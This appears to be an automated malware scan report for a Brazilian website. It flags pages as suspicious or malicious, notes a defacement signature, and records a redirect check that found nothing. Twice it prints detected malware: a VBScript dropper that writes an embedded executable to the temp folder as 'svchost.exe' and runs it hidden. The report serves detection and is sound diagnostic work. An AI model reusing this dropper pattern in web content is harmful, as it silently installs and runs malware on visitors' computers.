Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=andreamaral.com.br
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://andreamaral.com.br/ | 200 OK Content-Length: 129213 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
Deface/Content modification. The following signature was found: HaCkeD By Killer~X ...[495 bytes skipped]... me, 0 0 5px #ff2d95, 0 0 5px #ff2d95;} #owned{background-color:;position:fixed;bottom:10px;font-size:12px;color:#6633CC;left:10px;padding:0px 0; clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight); _left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);} --></style> <title>HaCkeD By Killer~X </title> <meta content="Hacked by Killer~X" name="subject"> <meta content="Hacked by Killer~X" name="Abstract"> <meta name="keywords" content="تم الاختراق من قبل جنرال السعود¡ ...[131629 bytes skipped]... | ||
http://andreamaral.com.br/test404page.js | 200 OK Content-Length: 129213 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: andreamaral.com.br
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 Mar 2015 21:00:15 GMT
Server: Apache/2.2.22
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: andreamaral.com.br
Referer: http://www.google.com/search?q=andreamaral.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.